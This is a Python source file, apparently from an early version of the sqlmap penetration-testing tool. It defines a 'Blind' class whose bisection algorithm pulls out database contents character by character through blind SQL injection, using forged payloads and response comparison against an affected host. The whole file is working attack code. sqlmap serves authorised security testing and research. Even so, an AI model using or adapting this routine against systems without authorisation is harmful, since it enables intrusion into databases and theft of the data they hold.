#!/usr/bin/env python


import sys
import time

from sqlmap.progress import ProgressBar
from sqlmap.request import Request


class Blind(Request, ProgressBar):
    """
    This class defines the algorithms that can be used to perform
    blind SQL injection on an affected host

    @author: Bernardo Damele
    """

    def bisectionAlgorithm(self, payload, expression, log=True, length=None):
        """
        Part of this simple implementation of the bisection algorithm was
        provided by diaul <diaul@devilopers.org>
        """

        if self.args.eta and length:
            length = int(length)
            progress = ProgressBar(maxValue=length)
            progressTime = []

        queriesCount = 0
        index = 0
        value = ""
        continueAlg = True

        if log and ( self.args.verbose == 1 and not ( self.args.eta and length ) ):
            sys.stdout.write("[%s] [INFO] retrieved: " % time.strftime("%X"))
            sys.stdout.flush()

        while continueAlg:
            index += 1
            charStart = time.time()
            maxValue = 127
            minValue = 0

            while (maxValue - minValue) != 1:
                queriesCount += 1
                limit = ((maxValue + minValue) / 2)

                forgedPayload = payload % (expression, index, limit)
                result = self.queryPage(forgedPayload)

                if result == self.args.defaultResult:
                    minValue = limit
                else:
                    maxValue = limit

                if (maxValue - minValue) == 1:
                    if maxValue == 1:
                        continueAlg = False
                        break

                    val = chr(minValue + 1)
                    value = value + val

                    if self.args.verbose == 1 and not ( self.args.eta and length ):
                        sys.stdout.write(val)
                        sys.stdout.flush()

                    if self.args.writeFile and log:
                        if val == "\n":
                            self.args.writeFile.write("__NEWLINE__")
                        elif val == "\t":
                            self.args.writeFile.write("__TAB__")
                        else:
                            self.args.writeFile.write(val)

                        self.args.writeFile.flush()

                    if self.args.eta and length:
                        charTime = time.time() - charStart

                        if len(progressTime) <= ( ( length * 3 ) / 100 ):
                            eta = 0
                        else:
                            totalTime = 0

                            for singleTime in progressTime:
                                totalTime += singleTime

                            midTime = totalTime / len(progressTime)
                            midTimeWithLatest = ( midTime + charTime ) / 2
                            eta = midTimeWithLatest * ( length - index )

                        progressTime.append(charTime)
                        progress.update(index)
                        progress.draw(eta)

        if self.args.verbose == 1 or ( self.args.eta and length ):
            sys.stdout.write("\n")

        if ( self.args.verbose == 1 and self.args.eta and length and len(str(progress)) >= 64 ) or self.args.verbose >= 2:
            if log:
                sys.stdout.write("[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), value))
            else:
                sys.stdout.write("[%s] [INFO] retrieved the length of query output: %s\n" % (time.strftime("%X"), value))

        sys.stdout.flush()

        if self.args.writeFile and log:
           self.args.writeFile.write("]\n")
           self.args.writeFile.flush()

        return queriesCount, value
